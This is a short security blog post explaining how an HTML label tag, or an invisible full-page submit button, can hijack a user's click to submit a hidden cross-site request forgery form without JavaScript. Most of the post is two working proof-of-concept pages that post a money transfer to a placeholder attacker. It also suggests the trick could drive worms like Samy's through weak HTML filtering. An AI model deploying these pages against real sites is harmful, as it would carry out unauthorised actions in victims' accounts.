All Articles

label clickjacking and javascriptless csrf

Another niche attack. I happened to notice the interesting behaviour of the <label> tag today while working on some web application development.

<label for="target">_STUFF_</label>

The for-attribute triggers a click event on the targeted element by id. It can trigger the click events on a bunch of different input-tags whenever anything between it’s start and end tags are clicked. This is an intended behaviour, but it can be abused for clickjacking.

Here is a way to abuse it for submitting csrf forms.

<!DOCTYPE html>
<html>
  <body>
    <label
      for="target_element"
      style="display: block; height: 13370px; width: 100%;"
    >
    </label>

    <form method="post" action="http://victim" style="display: none;">
      <input type="text" name="moneys" value="all" />
      <input type="text" name="recipient" value="evul_haxxer" />
      <input
        id="target_element"
        type="submit"
        name="send"
        value="Send moneys"
      />
    </form>
  </body>
</html>

Of course, it’s a bit redundant. The following snippet does the same thing without using the label tag at all.

<!DOCTYPE html>
<html>
  <body>
    <form method="post" action="http://victim">
      <input
        id="target_element"
        type="submit"
        name="send"
        value="Send moneys"
        style="display: block; height: 13370px; width: 100%; opacity: 0;"
      />
      <input type="text" name="moneys" value="all" />
      <input type="text" name="recipient" value="evul_haxxer" />
    </form>
  </body>
</html>

I tested both of these in firefox with noscript and they pass.

But imagine a scenario where the HTML filtering is not quite as secure as it should be and the label-tag can be submitted. Then it could be abused to trigger clicks on the rendered site without the user’s consent. Imagine a social media site with a “like”-functionality alá Facebook for example. Triggering a click on the like could make for some fun Samy-like worms.

Fortunately, most sites use whitelists for html user input these days.